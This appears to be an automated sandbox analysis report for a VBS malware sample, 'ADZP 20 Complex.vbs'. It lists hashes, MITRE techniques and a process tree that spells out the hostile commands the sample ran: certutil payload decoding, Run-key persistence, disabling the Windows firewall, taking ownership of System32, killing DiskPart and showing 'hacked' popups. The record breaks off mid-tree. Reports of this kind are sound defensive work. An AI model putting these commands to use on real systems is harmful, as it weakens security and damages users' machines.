d6607a9ec5fc0698f50382ffe61a4ad1f36a8b26c0834c305f40e41647980668

Analysis

max time kernel
14s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25-05-2024 17:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.vbs
Size

32KB
MD5

36deca5bd53f31d062d07c1d3fa0cc8d
SHA1

1d245de03d3725b180f572b15036cbb168445edf
SHA256

d6607a9ec5fc0698f50382ffe61a4ad1f36a8b26c0834c305f40e41647980668
SHA512

e1253113a5dfd1cd7e93dfe45649d89e072db432b1724aaf36c7b082b38e770c4755e4d01c136134bb9356f74daa1e7205e5fa43f575edb5013a91f738be71c1
SSDEEP

384:WO9h4Bbs9odeP93e6xj6BT2xg2mP+CMdNLjl9NQJW:lZ+kPxe6x+BT22FGCMdtZoW

Score

8^/10

discovery evasion spyware stealer

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

8272 netsh.exe
8300 netsh.exe

pid	process
8272	netsh.exe
8300	netsh.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.execmd.execmd.exeWScript.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe

Modifies file permissions 1 TTPs 14 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
4520	takeown.exe
8528	takeown.exe
3172	takeown.exe
13120	takeown.exe
9160	takeown.exe
8364	takeown.exe
9516	takeown.exe
9828	takeown.exe
3480	takeown.exe
1472	takeown.exe
5256	takeown.exe
6040	takeown.exe
4880	takeown.exe
3036	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops autorun.inf file 1 TTPs 6 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

cmd.exeattrib.execmd.execmd.execmd.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe

Drops file in System32 directory 5 IoCs

Processes:

cmd.execmd.execmd.execmd.exe

description	ioc	process
File created	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe

Drops file in Windows directory 3 IoCs

Processes:

mspaint.exemspaint.exemspaint.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 13 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
9316	ipconfig.exe
2600	ipconfig.exe
9272	ipconfig.exe
9900	ipconfig.exe
9092	ipconfig.exe
1916	ipconfig.exe
5448	ipconfig.exe
8584	ipconfig.exe
9120	ipconfig.exe
8892	ipconfig.exe
9312	ipconfig.exe
2460	ipconfig.exe
1608	ipconfig.exe

Kills process with taskkill 13 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
9692	taskkill.exe
11256	taskkill.exe
4500	taskkill.exe
3440	taskkill.exe
9656	taskkill.exe
9304	taskkill.exe
4980	taskkill.exe
5200	taskkill.exe
9144	taskkill.exe
1220	taskkill.exe
9368	taskkill.exe
9636	taskkill.exe
10536	taskkill.exe

Modifies registry class 10 IoCs

Processes:

cmd.exeexplorer.execalc.execalc.exeexplorer.exeexplorer.execmd.execmd.execalc.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

mspaint.exemspaint.exemspaint.exe

pid process

2912 mspaint.exe
2912 mspaint.exe
4364 mspaint.exe
4364 mspaint.exe
4016 mspaint.exe
4016 mspaint.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

takeown.exetaskkill.exetakeown.exetakeown.exetaskkill.exetakeown.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	4520	takeown.exe
Token: SeDebugPrivilege	4500	taskkill.exe
Token: SeTakeOwnershipPrivilege	3480	takeown.exe
Token: SeTakeOwnershipPrivilege	1472	takeown.exe
Token: SeDebugPrivilege	5200	taskkill.exe
Token: SeTakeOwnershipPrivilege	5256	takeown.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

mspaint.exemspaint.exemspaint.exeOpenWith.exeOpenWith.exeOpenWith.exe

pid	process
2912	mspaint.exe
4364	mspaint.exe
2912	mspaint.exe
2912	mspaint.exe
2912	mspaint.exe
4364	mspaint.exe
4364	mspaint.exe
4364	mspaint.exe
4016	mspaint.exe
4016	mspaint.exe
4016	mspaint.exe
4016	mspaint.exe
5032	OpenWith.exe
884	OpenWith.exe
5424	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.execmd.execmd.exe

description	pid	process	target process
PID 1724 wrote to memory of 5052	1724	WScript.exe	cmd.exe
PID 1724 wrote to memory of 5052	1724	WScript.exe	cmd.exe
PID 5052 wrote to memory of 4720	5052	cmd.exe	certutil.exe
PID 5052 wrote to memory of 4720	5052	cmd.exe	certutil.exe
PID 5052 wrote to memory of 4080	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 4080	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 1768	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 1768	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 1604	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 1604	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 1076	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 1076	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 3440	5052	cmd.exe	reg.exe
PID 5052 wrote to memory of 3440	5052	cmd.exe	reg.exe
PID 5052 wrote to memory of 1600	5052	cmd.exe	reg.exe
PID 5052 wrote to memory of 1600	5052	cmd.exe	reg.exe
PID 5052 wrote to memory of 2460	5052	cmd.exe	explorer.exe
PID 5052 wrote to memory of 2460	5052	cmd.exe	explorer.exe
PID 1076 wrote to memory of 4520	1076	cmd.exe	takeown.exe
PID 1076 wrote to memory of 4520	1076	cmd.exe	takeown.exe
PID 5052 wrote to memory of 4500	5052	cmd.exe	taskkill.exe
PID 5052 wrote to memory of 4500	5052	cmd.exe	taskkill.exe
PID 5052 wrote to memory of 3472	5052	cmd.exe	attrib.exe
PID 5052 wrote to memory of 3472	5052	cmd.exe	attrib.exe
PID 5052 wrote to memory of 4744	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 4744	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 3924	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 3924	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 2892	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 2892	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 2780	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 2780	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 3088	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 3088	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 3740	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 3740	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 1728	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 1728	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 4604	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 4604	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 412	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 412	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 1612	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 1612	5052	cmd.exe	WScript.exe
PID 5052 wrote to memory of 2364	5052	cmd.exe	msg.exe
PID 5052 wrote to memory of 2364	5052	cmd.exe	msg.exe
PID 5052 wrote to memory of 1828	5052	cmd.exe	msg.exe
PID 5052 wrote to memory of 1828	5052	cmd.exe	msg.exe
PID 5052 wrote to memory of 4864	5052	cmd.exe	msg.exe
PID 5052 wrote to memory of 4864	5052	cmd.exe	msg.exe
PID 5052 wrote to memory of 1084	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 1084	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 2500	5052	cmd.exe	notepad.exe
PID 5052 wrote to memory of 2500	5052	cmd.exe	notepad.exe
PID 5052 wrote to memory of 4724	5052	cmd.exe	calc.exe
PID 5052 wrote to memory of 4724	5052	cmd.exe	calc.exe
PID 5052 wrote to memory of 3948	5052	cmd.exe	explorer.exe
PID 5052 wrote to memory of 3948	5052	cmd.exe	explorer.exe
PID 5052 wrote to memory of 2912	5052	cmd.exe	mspaint.exe
PID 5052 wrote to memory of 2912	5052	cmd.exe	mspaint.exe
PID 5052 wrote to memory of 1192	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 1192	5052	cmd.exe	cmd.exe
PID 5052 wrote to memory of 4984	5052	cmd.exe	notepad.exe
PID 5052 wrote to memory of 4984	5052	cmd.exe	notepad.exe

Views/modifies file attributes 1 TTPs 13 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
5220	attrib.exe
1640	attrib.exe
10888	attrib.exe
8244	attrib.exe
1384	attrib.exe
3472	attrib.exe
1788	attrib.exe
9644	attrib.exe
540	attrib.exe
9324	attrib.exe
9296	attrib.exe
9968	attrib.exe
9976	attrib.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\TempShingapi.sk.bat" "
2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\system32\certutil.exe
certutil -decode x.bin ADZP-20-Complex.bat
3⤵
PID:4720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:4080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:1768

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:3440

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:1600

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:2460

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4500

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:3472

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3924

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2892

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2780

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3088

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3740

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1728

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4604

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:412

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:1612

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:2364

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:1828

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
3⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:2760

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:5592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:5684

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3480

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6112

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5236

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:1608

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:4980

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:1788

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:5512

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:4452

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:884

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5228

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:5200

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:4636

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:3812

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:1788

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:1384

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:4648

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:6164

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:6200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8664

C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
6⤵
PID:9120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8672

C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
6⤵
PID:9104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:8932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:9044

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:6040

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8344

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:6068

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:9120

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:9368

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:9644

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10640

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10776

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10956

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:11192

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4632

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10560

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:11004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:8968

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:11256

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:11560

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:11748

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:11232

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:8824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:1460

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12224

C:\Windows\system32\calc.exe
calc
5⤵
PID:8276

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11392

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:13292

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:2044

C:\Windows\system32\calc.exe
calc
5⤵
PID:1972

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:6420

C:\Windows\system32\calc.exe
calc
4⤵
PID:6520

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:6656

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:6760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2736

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
5⤵
- Modifies Windows Firewall
PID:8272

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:9096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:5760

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:4880

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8876

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8452

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:8892

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:9636

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:9976

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10964

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:11184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:5140

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9408

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:2716

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9296

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:7512

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:6788

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:11496

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:11812

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:12068

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:10980

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:3340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:12024

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12292

C:\Windows\system32\calc.exe
calc
5⤵
PID:12964

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:8940

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:10844

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:7152

C:\Windows\system32\calc.exe
calc
4⤵
PID:4616

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:6516

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:1080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:7212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:1836

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
6⤵
PID:4500

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
6⤵
PID:8216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
